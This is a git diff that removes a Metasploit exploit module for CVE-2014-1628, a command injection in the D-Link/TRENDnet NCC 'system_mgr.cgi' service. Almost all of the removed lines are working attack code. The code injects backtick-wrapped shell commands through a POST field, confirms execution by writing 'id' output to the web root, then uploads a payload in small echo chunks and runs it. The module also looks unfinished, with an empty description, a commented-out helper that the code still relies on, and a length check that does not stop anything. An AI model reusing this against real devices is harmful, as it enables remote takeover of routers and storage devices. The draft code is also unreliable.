diff --git a/modules/exploits/linux/http/trendnet_cve-2014-1628.rb b/modules/exploits/linux/http/trendnet_cve-2014-1628.rb
deleted file mode 100644
index e7d40248cb..0000000000
--- a/modules/exploits/linux/http/trendnet_cve-2014-1628.rb
+++ /dev/null
@@ -1,156 +0,0 @@
-##
-# This module requires Metasploit: http://metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-class Metasploit3 < Msf::Exploit::Remote
- include Msf::Exploit::Remote::HttpClient
- include Msf::Exploit::FileDropper
-
- def initialize(info = {})
- super(update_info(info,
- 'Name' => 'D-Link/TRENDnet NCC Service Command Injection',
- 'Description' => %q{
- },
- 'Author' =>
- [
- 'Jon Hart '
- ],
- 'License' => MSF_LICENSE,
- 'References' =>
- [
- ['CVE', '2014-1628']
- ],
- 'Platform' => ['unix'],
- 'Arch' => ARCH_CMD,
- 'Privileged' => false,
- 'Payload' =>
- {
- 'EncoderType' => Msf::Encoder::Type::CmdUnixEcho,
- 'Compat' =>
- {
- 'PayloadType' => 'cmd',
- 'RequiredCmd' => 'generic perl'
- }
- },
- 'Targets' =>
- [
- [ 'Automatic', { } ]
- ],
-# 'Targets' =>
-# [
-# [ 'Linux mipsel Payload',
-# {
-# 'Arch' => ARCH_MIPSLE,
-# 'Platform' => 'linux',
-# 'EncoderType' => Msf::Encoder::Type::CmdUnixEcho
-# }
-# ],
-# [ 'Linux mipsbe Payload',
-# {
-# 'Arch' => ARCH_MIPSBE,
-# 'Platform' => 'linux',
-# 'EncoderType' => Msf::Encoder::Type::CmdUnixEcho
-# }
-# ],
-# ],
- 'DisclosureDate' => 'Feb 26 2015',
- 'DefaultTarget' => 0))
-
- register_options(
- [
- OptString.new('TARGETURI', [true, 'The base path to the vulnerable application area', '/cgi-bin/system_mgr.cgi']),
- ], self.class)
- end
-
- MAX_CMD_SIZE = 13
-
- def check
- # run id and redirect output to a file we can access remotely.
- canary_file = Rex::Text.rand_text_alpha(1)
- exec_command("id>/var/www/#{canary_file}")
- # snag a copy of the file
- res = send_request_cgi({
- 'method' => 'GET',
- 'uri' => "/#{canary_file}"
- })
- # clean up
- exec_command("rm /var/www/#{canary_file}")
-
- if res
- if res && res.code == 200
- if res.body =~ /uid=/
- print_good("Simple code execution possible as #{res.body}")
- return Exploit::CheckCode::Vulnerable
- end
- end
- end
-
- return Exploit::CheckCode::Unknown
- end
-
- def exec_command(cmd, timeout = 20)
- if cmd.length > MAX_CMD_SIZE
- puts "cmd too long"
- end
- begin
- res = send_request_cgi({
- 'method' => 'POST',
- 'uri' => normalize_uri(target_uri.path),
- 'encode_params' => false,
- 'vars_post' => {
- 'cmd' => 'cgi_log_server',
- 'f_enable' => 1,
- 'f_ip' => "`#{cmd}`"
- }
- }, timeout)
- return res
- rescue ::Rex::ConnectionError
- fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
- end
- end
-
- def exploit
- print_status("#{peer} - Accessing the vulnerable URL...")
-
- unless check == Exploit::CheckCode::Vulnerable
- fail_with(Failure::NoTarget, "#{peer} - Failed to access the vulnerable URL")
- end
-
- print_status("#{peer} - Exploiting...")
- payload_path = "/#{Rex::Text.rand_text_numeric(1)}"
-
- # create an echo wrapper that is smaller
- vprint_status("Uploading echo wrapper")
- echo_path = "e"
-# exec_command("echo -n ech>#{echo_path}")
-# exec_command("echo -n o>>#{echo_path}")
-# exec_command("echo -n \\ >>#{echo_path}")
-# exec_command("echo -n - >>#{echo_path}")
-# exec_command("echo -n n >>#{echo_path}")
-# exec_command("echo -n e >>#{echo_path}")
-# exec_command("echo -n \\ >>#{echo_path}")
-# exec_command("echo -n $ >>#{echo_path}")
-# exec_command("echo -n @ >>#{echo_path}")
-# exec_command("chmod 755 #{echo_path}")
- # create empty payload file
- exec_command(">#{payload_path}")
- redirect = ">>#{payload_path}"
- echo_cmd = "/#{echo_path} "
- chunk_size = MAX_CMD_SIZE - (echo_cmd.length + redirect.length)
- encoded_payload = Rex::Text.to_hex(payload.encoded, "\\\\x")
- encoded_payload_offset = 0
- vprint_status("Uploading payload")
- until (encoded_payload_offset >= encoded_payload.length) do
- exec_command("#{echo_cmd}#{encoded_payload.slice(encoded_payload_offset, chunk_size)}#{redirect}")
- encoded_payload_offset += chunk_size
- end
-
- puts "Executing #{payload_path}"
- exec_command("sh #{payload_path}")
- #exec_command("rm #{payload_path}")
- return
- end
-end